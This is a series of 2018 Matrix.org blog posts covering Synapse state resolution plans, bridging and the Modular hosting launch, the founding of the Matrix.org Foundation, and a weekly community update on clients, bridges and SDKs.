  • Chunks.  Currently, Synapse models all events in a room as being part of a single DAG, which can be problematic if a server sees lots of disconnected sections of the DAG (e.g. due to intermittent connectivity somewhere in the network), as Synapse will frantically try to resolve all these disconnected sections of DAG together.  Instead, a better solution is to explicitly model these sections of DAG as separate entities called Chunks, and not try to resolve state between disconnected Chunks but instead consider them independent fragments of the room - and thus simplify state resolution calculations significantly. It also fixes an S2S API design flaw where previously we trusted servers to state the ordering (depth) of the events they provided; with chunks, the receiving server can keep track of that itself by tracking a DAG of chunks (as well as the normal event DAG within the chunks).  Now, most of the work for this has already happened, but it is currently parked until the new state res has landed.
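
As trailed above, the memoization idea behind incremental state resolution is simple enough to sketch in a few lines: cache the result of resolving a given combination of state groups, so that when the same extremities come up again (as they constantly do in a busy room) the answer is a lookup rather than a full recalculation.  Synapse's real implementation will inevitably look different; resolve_state_groups below is a hypothetical stand-in for the full (v2) resolution algorithm.

    # A minimal sketch of memoized ("incremental") state resolution, assuming a
    # hypothetical resolve_state_groups() that runs the full v2 algorithm.
    from functools import lru_cache

    @lru_cache(maxsize=10_000)
    def _resolve_cached(state_group_ids: frozenset):
        return resolve_state_groups(state_group_ids)

    def state_at_extremities(extremity_state_groups):
        # The cache key is the *set* of state groups involved, so re-resolving
        # the same combination is a dictionary lookup rather than a CPU spike.
        return _resolve_cached(frozenset(extremity_state_groups))
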
Meanwhile, over on Dendrite, we made the conscious decision to get 1.0 out the door on Synapse first rather than trying to implement and iterate on the stuff needed for 1.0 on both Synapse & Dendrite simultaneously.  However, Dendrite has been ticking along thanks to work from Brendan, Anoa and APWhitehat - and the plan is to use it for more niche homeserver work at first; e.g. constrained resource devices (Dendrite uses 5-10x less RAM than Synapse on Py3), clientside homeservers, experimental routing deployments, etc.  In the longer term we expect it to grow into a fully fledged HS though!

Bridging

2018 was a bit of a renaissance for Bridging, largely thanks to Half-Shot coming on board in the Summer to work on IRC bridging and finally get to the bottom of the stability issues which plagued the Freenode bridge for the previous, uh, few years.  Meanwhile the Slack bridge got its first ever release - and more recently there's some Really Exciting Stuff happening with matrix-appservice-purple: a properly usable bridge through to any protocol that libpurple can speak… which, as of a few days ago, also supports native XMPP bridging via XMPP.js.  There'll probably be a dedicated blogpost about all of this in the new year, especially when we deploy it all on Matrix.org. Until then, the best way to learn more is to watch last week's Matrix Live and hear it all first hand.

Modular

One of the biggest newcomers of 2018 was the launch of Modular.im in October - the world's first commercial Matrix hosting service.  Whilst (like Riot), Modular isn't strictly-speaking a Matrix.org project - it feels appropriate to mention it here, not least because it's helping directly fund the core Matrix dev team.

So far Modular has seen a lot of interest from folks who want to spin up a super-speedy dedicated homeserver run by us rather than having to spend the time to build one themselves - or folks who have yet to migrate from IRC and want a better-than-IRC experience which still bridges well.  One of the nice bits is that the servers are still decentralised and completely operationally independent of one another, and there have been a bunch of really nice refinements since launch, including the ability to point your own DNS at the server and matrix->matrix migration tools, with custom branding and other goodness coming soon.  If you want one-click Matrix hosting, please give Modular a go :)

Right now we're promoting Modular mainly to existing Matrix users, but once the Riot redesign is finished you should expect to see some very familiar names popping up on the platform :D

TWIM

Unless you were living under a rock, you'll hopefully have also realised that 2018 was the year that brought us This Week In Matrix (TWIM) - our very own blog tracking all the action across the whole Matrix community on a weekly basis.  Thank you to everyone who contributes updates, and to Ben for editing it each week. Go flip through the archives to find out what's been going on in the wider community over the course of the year!  (This blog post is already way too long without trying to cover the rest of the ecosystem too :)

Shapes of Things to Come

Finally, a little Easter egg (it is Christmas, after all) for anyone crazy enough to have read this far: The eagle-eyed amongst you might have noticed that one of our accepted talks for FOSDEM 2019 is “Breaking the 100bps barrier with Matrix” in the Real Time Communications devroom.  We don't want to spoil the full surprise, but here's a quick preview of some of the more exotic skunkworks we've been doing on low-bandwidth routing and transports recently.  Right now it shamelessly assumes that you're running within a trusted network, but once we solve that it will of course be proposed as an MSC for Matrix proper.  A full write-up and code will follow, but for now, here's a mysterious video…

(If you're interested in running Matrix over low-bandwidth networks, please get in touch - we'd love to hear from you...)

2019

So, what will 2019 bring?

In the short term, as should be obvious from the above, our focus is on:

  • r0 spec releases across the board (aka Matrix 1.0)
  • Implementing them in Synapse
  • Landing the Riot redesign
  • Landing all the new E2E encryption UX and features
  • Finalising the Matrix.org Foundation
However, beyond that, there are a lot of possible options on the table in the medium term:
  • Reworking and improving Communities/Groups.
  • Reactions.
  • E2E-encrypted Search
  • Filtering (empowering users to filter out rooms & content they're not interested in).
  • Extensible events.
  • Editable messages.
  • Extensible Profiles (we've actually been experimenting with this already).
  • Threading.
  • Landing the Riot/Android rewrite
  • Scaling synapse via sharding the master process
  • Bridge UI for discovery of users/rooms and bridge status
  • Considering whether to do a similar overhaul of Riot/iOS
  • Bandwidth-efficient transports
  • Bandwidth-efficient routing
  • Getting Dendrite to production.
  • Inline widgets (polls etc)
  • Improving VoIP over Matrix.
  • Adding more bridges, and improving the current ones.
  • Account portability
  • Replacing MXIDs with public keys
In the longer term, options include:
  • Shared-code cross-platform client SDKs (e.g. sharing a native core library between matrix-{js,ios,android}-sdk)
  • Matrix daemons (e.g. running an always-on client as a background process in your OS which apps can connect to via a lightweight CS API)
  • Push notifications via Matrix (using a daemon-style architecture)
  • Clientside homeservers (i.e. p2p matrix) - e.g. compiling Dendrite to WASM and running it in a service worker.
  • Experimenting with MLS for E2E Encryption
  • Storing and querying more generic data structures in Matrix (e.g. object trees; scene graphs)
  • Alternate use cases for VR, IoT, etc.
Obviously we're not remotely going to do all of that in 2019, but this serves to give a taste of the possibilities on the menu post-1.0; we'll endeavour to publish a more solid roadmap when we get to that point.

And on that note, it's time to call this blogpost to a close. Thanks to anyone who read this far, and thank you, as always, for flying Matrix and continuing to support the project.  The next few months should be particularly fun; all the preparation of 2018 will finally pay off :)

Happy holidays,

Matthew, Amandine & the whole Matrix.org team.

Introducing the Matrix.org Foundation (Part 1 of 2)

29.10.2018 00:00 — General Matthew Hodgson

Hi all,

Back in June we blogged about the plan of action to establish a formal open governance system for the Matrix protocol: introducing both the idea of the Spec Core Team to act as the neutral technical custodian of the Matrix Spec, as well as confirming the plan to incorporate the Matrix.org Foundation to act as a neutral non-profit legal entity which can act as the legal Guardian for Matrix's intellectual property, gather donations to fund Matrix work, and be legally responsible for maintaining and evolving the spec in a manner which benefits the whole ecosystem without privileging any individual commercial concerns.  We published a draft proposal for the new governance model at MSC1318: a proposal for open governance of the Matrix.org Spec to gather feedback and to trial during the day-to-day development of the spec. Otherwise, we refocused on getting a 1.0 release of the Spec out the door, given there's not much point in having a fancy legal governance process to safeguard the evolution of the Spec when we don't even have a stable initial release!

We were originally aiming for end of August to publish a stable release of all Matrix APIs (and thus a so-called 1.0 of the overall standard) - and in the end we managed to publish stable releases of 4 of the 5 APIs (Client-Server, Application Service, Identity Service and Push APIs) as well as a major overhaul of the Server-Server (SS) API.  However, the SS API work has run on much longer than expected, as we've ended up both redesigning and needing to implement many major changes to the protocol: the new State Resolution algorithm (State Resolution Reloaded) to fix state resets; versioned rooms (in order to upgrade to the new algorithm); changing event IDs to be hashes; and fixing a myriad of federation bugs in Synapse.  Now, the remaining work is progressing steadily (you can see the progress over at https://github.com/orgs/matrix-org/projects/2 - although some of the cards are redacted because they refer to non-spec consulting work) - and the end is in sight!

So, in preparation for the upcoming Matrix 1.0 release, we've been moving ahead with the rest of the open governance plan - and we're happy to announce that as of a few hours ago, the initial incarnation of The Matrix.org Foundation exists!

Now, it's important to understand that this process is not finished - what we've done is to set up a solid initial basis for the Foundation in order to finish refining MSC1318 and turning it into the full Articles of Association of the Foundation (i.e. the legal framework which governs the remit of the Foundation), which we'll be working on over the coming weeks.

In practice, what this means is that in the first phase, today's Foundation gives us:

  • A UK non-profit company - technically incorporated as a private company, limited by guarantee.
  • Guardians, whose role is to be legally responsible for ensuring that the Foundation (and by extension the Spec Core Team) keeps on mission and neutrally protects the development of Matrix.  Matrix's Guardians form the Board of Directors of the Foundation, and will provide a 'checks and balances' mechanism between each other to ensure that all Guardians act in the best interests of the protocol and ecosystem.

    For the purposes of initially setting up the Foundation, the initial Guardians are Matthew & Amandine - but in the coming weeks we're expecting to appoint at least three independent Guardians in order to ensure that the current team form a minority on the board and ensure the neutrality of the Foundation relative to Matthew & Amandine's day jobs at New Vector.  The profile we're looking for in Guardians is: folks who are independent of the commercial Matrix ecosystem (and especially independent from New Vector), and who may not even be members of today's Matrix community, but who are deeply aligned with the mission of the project, and who are respected and trusted by the wider community to uphold the guiding principles of the Foundation and keep the other Guardians honest.
  • An immutable asset lock, to protect the intellectual property of the Foundation and prevent it from ever being sold or transferred elsewhere.
  • An immutable mission lock, which defines the Foundation's mission as a non-profit neutral guardian of the Matrix standard, with an initial formal goal of finalising the open governance process.  To quote article 4 from the initial Articles of Association:
    • 4. The objects of the Foundation are for the benefit of the community as a whole to:

      4.1.1  empower users to control their communication data and have freedom over their communications infrastructure by creating, maintaining and promoting Matrix as an openly standardised secure decentralised communication protocol and network, open to all, and available to the public for no charge;

      4.1.2  build and develop an appropriate governance model for Matrix through the Foundation, in order to drive the adoption of Matrix as a single global federation, an open standard unencumbered from any proprietary intellectual property and/or software patents, minimising fragmentation (whilst encouraging experimentation), maximising speed of development, and prioritising the long-term success and growth of the overall network over the commercial concerns of an individual person or persons.
  • You can read the initial Articles of Association here (although all the rest of it is fairly generic legal boilerplate for a non-profit company at this point which hasn't yet been tuned; the Matrix-specific stuff is Article 4 as quoted above).  You can also see the initial details of the Foundation straight from the horse's mouth over at https://beta.companieshouse.gov.uk/company/11648710.
Then, in the next and final phase, what remains is to:
  • Appoint 3+ more Guardians (see above).
  • Finalise MSC1318 and incorporate the appropriate bits into the Articles of Association (AoA).  (We might literally edit MSC1318 directly into the final AoA, to incorporate as much input as possible from the full community.)
  • Tune the boilerplate bits of the AoA to incorporate the conclusions of MSC1318.
  • Register the Foundation as a Community Interest Company, to further anchor the Foundation as being for the benefit of the wider community.
  • Perform an Asset Transfer of any and all Matrix.org property from New Vector to the Foundation (especially the Matrix.org domain and branding, and donations directed to Matrix.org).
So there you have it! It's been a long time in coming, and huge thanks to everyone for their patience and support in getting to this point, but finally The Matrix.org Foundation exists.  Watch this space over the coming weeks as we announce the Guardians and finish bootstrapping the Foundation into its final long-term form!  Meanwhile, any questions: come ask in #matrix-spec-process:matrix.org or in the blog comments here.

thanks,

Matthew, Amandine, and the forthcoming Guardians of [the] Matrix!

Modular: the world’s first Matrix homeserver hosting provider!

22.10.2018 00:00 — In the News Matthew Hodgson

Hi folks,

Today is one of those pivotal days for the Matrix ecosystem: we're incredibly excited to announce that the world's first ever dedicated homeserver hosting service is now fully available over at https://modular.im!  This really is a massive step for Matrix towards being a mature ecosystem, and we look forward to Modular being the first of many hosting providers in the years to come :D

Modular lets anyone spin up a dedicated homeserver and Riot via a super-simple web interface, rather than having to run and admin their own server.  It's built by New Vector (the startup who makes Riot and hires many of the Matrix core team), and comes from taking the various custom homeserver deployments for people like Status and TADHack and turning them into a paid service available to everyone.  You can even point your own DNS at it to get a fully branded dedicated homeserver for your own domain!

Anyway, for full details, check out the announcement over at the Riot blog.  We're particularly excited that Modular helps increase Matrix's decentralisation, and is really forcing us to ensure that the Federation API is getting the attention it deserves.  Hopefully it'll also reduce some load from the Matrix.org homeserver! Modular will also help Matrix by directly funding Matrix development by the folks working at New Vector, which should in turn of course benefit the whole ecosystem.

Many people reading this likely already run their own servers, and obviously they aren't the target audience for Modular.  But for organisations who don't have a sysadmin or don't want to spend the time to run their own server, hopefully Modular gives a very cost-effective way of running your own dedicated reliable Matrix server without having to pay for a sysadmin :)

We're looking forward to seeing more of these kinds of services popping up in the future from everywhere in the ecosystem, and have started a Matrix Hosting page on the Matrix website so that everyone can advertise their own: don't hesitate to get in touch if you have a service to be featured!

If you're interested, please swing by #modular:matrix.org or feel free to shoot questions to [email protected].

This Week In Matrix 2018-09-07

08.09.2018 00:00 — This Week in Matrix Matthew Hodgson

Hi all,

Ben's away today, so this TWIM is brought to you mainly in association with Cadair's TWIMbot!

Spec Activity

Since last week's sprint to get the new spec releases out, the core team's focus has shifted exclusively to the remaining stuff needed to cut the first stable release of the Server-Server API.  In practice this means fleshing out the MSCs in flight and implementing them - work has progressed on improving auth rules, switching event IDs to be hashes, and more.  Whilst implementing this in Synapse we're also doing a complete audit and overhaul of the current federation code, hence the 0.33.3.1 security release this week.

Meanwhile, in the community, ma1uta reports:

I am working on the jeon (java matrix api) to update it to the latest stable release. Also I changed versions of api to form rX.Y.Z-N where rX.Y.Z is a API version and N is a library version within API. So, I have prepared Push API (r0.1.0-1), Identity API (r0.1.0-1) and Appservice API (r0.1.0-1) for the first release and current updating the C2S API to the r0.4.0 version.

XMPP Bridging

Are you in the market for a Matrix-XMPP bridge? When I say "market", I mean it because this week we have two announcements for bridging to XMPP! You can choose whether you'd prefer your bridge to be implemented as a puppet, or a bot.

Ma1uta has a new version of his Matrix-XMPP bridge:

It is a double-puppet bridge which can connect the Matrix and XMPP ecosystems. Just invite @_xmpp_master:ru-matrix.org and tell him: @_xmpp_master: connect [email protected] to connect the current room with the specified conference.
You can ask about this bridge in the #matrix-jabber-java-bridge:ru-matrix.org room.
Currently it supports only conferences and only m.text messages. 1:1 conversations and other message types will come later.

maze appeared this week and announced MxBridge, a new Matrix-XMPP bridge:

It works as a bot, so it is non-puppeting. Rooms can be mapped dynamically by the bot administrator(s). There is no support for 1-1 chats (yet). MxBridge is written as a multi-process application in Elixir and it should scale quite well (but don't tie me down on it ;)). https://github.com/djmaze/mxbridge

Seaglass

Neil powers onwards with Seaglass, with updates this week including:

  • Displaying stickers
  • Lazy-loading room history on startup to help with performance
  • Scrollback support (both forwards and backwards)
  • Support for Matthew's Account (aka retries on initial sync for those of us with massive initial syncs, and general perf improvements to nicely support >2000 rooms)
  • Better avatar support & cosmetics on macOS Mojave
  • Encryption verification support, device blacklisting and message information
  • Ability to turn encryption on in rooms
  • Responding to encryption being turned on in rooms
  • Paranoid mode for encryption (only send to verified devices)
  • Invitation support (both in UI and /invite)

Matrique

Blackhat announces that Matrique's new design is almost done, along with GNU/Linux, macOS and Windows nightly builds!

Fractal

Alexandre Franke says:

Fractal 3.30 got released alongside the rest of GNOME. It includes a bunch of new and updated translations, and redacted messages are now hidden.

Meanwhile, hidden in this screenshot, uhoreg noted that E2E plans are progressing...

Riot

Bruno has been hacking away on Riot/Web, squashing the remaining Lazy Loading Members defects and landing various related optimisations and fixes. We also released Riot/Web 0.16.3 as a fairly minor point release (which unfortunately has a regression with DM avatars; this is fixed in 0.16.4, for which a first RC was cut a few hours ago and should be released on Monday).  Meanwhile the first cut of Lazy Loading also got implemented on Android. Both are hidden behind labs flags, but we're almost at the point where we can turn it on now!  Otherwise, the Riot team has got sucked into working on commercial Matrix stuff, for better or worse (all shall be revealed shortly though!)

Construct

Jason has been working heavily on Construct, and has new test users.  Construct is able to federate with Synapse and the rest of the Matrix ecosystem.  mujx has created a docker for Construct which streamlines its deployment.

Construct development is still occurring here https://github.com/jevolk/charybdis but we are now significantly closer to pushing the first release to https://github.com/matrix-construct. Also feel free to stop by in #test:zemos.net / #zemos-test:matrix.org as well -- a room hosted by Construct, of course.

tulir has now deployed using the standalone install instructions on a very small LXC VM using ZFS. Unfortunately ZFS does not support O_DIRECT (direct disk IO) which is how Construct achieves maximum performance using concurrent reads. This is not a problem though when using an SSD or for personal deployments. I'll be posting more about how Construct hacked RocksDB to use direct IO, which can get the most out of your hardware with multiple requests in-flight (even with an SSD).

Synapse

Work this week was split between spec and security work, with the critical update for 0.33.3.1 - if you haven't upgraded, please do so immediately.

Otherwise, Hawkowl has been on a mission to finish the Python 3 port, which is now almost merged.  Testers should probably wait until it fully merges to the develop branch and we'll yell about it then, but impatient adrenaline enthusiasts may want to check out the hawkowl/py3-3 branch (although it may explode in your face, mangle your DB and format your cat, and probably misses lots of recent important PRs like the 0.33.3.1 stuff).  However, I've been running a variant on some servers for the last few days without problems - and it seems (placebo effect notwithstanding) incredibly snappy...

Meanwhile, the Lazy Loading Members implementation got sped up by 2-3x, which makes /sync roughly 2-3x faster than it would be without Lazy Loading.  This hasn't merged yet, but it was the main final blocker to Lazy Loading going live!

matrix-docker-ansible-deploy

Slavi reports:

matrix-docker-ansible-deploy now supports bridging to Telegram by installing tulir's mautrix-telegram bridge. This feature is contributed by @izissise.

In addition, Matrix Synapse is now more configurable from the playbook, with support for enabling stats-reporting, event cache size configurability, and password peppering.

Matrix Python SDK needs a maintainer

We should say a huge Thank You to Adam for his work leading the Python SDK over the previous months! Unfortunately, due to a busy home life (best of luck with the second child!) he has decided to step down as lead maintainer. Anyone interested in this project should head to https://github.com/matrix-org/matrix-python-sdk/issues/279, and also come and chat in #matrix-python-sdk:matrix.org.

MatrixToyBots!

Coffee reports that:

A new bot appears! Are you a pedantic academic who likes to correct others' misuse of Latin-derived plurals? This task can now be automated for you by means of SingularBot! Also for people who just like to have some fun. Free PongBot and SmileBot included.

kitsune on Hokkaido island

I ended up being on Hokkaido island right when a major earthquake struck it; so no activity on Matrix from me in the nearest couple of days. Also, donations to GlobalGiving for the disaster relief are welcome because people are really struggling here (abusing the communication channel, sorry).

Matrix Live

...has got delayed again; sorry - we're rather overloaded atm. We'll catch up as soon as we can.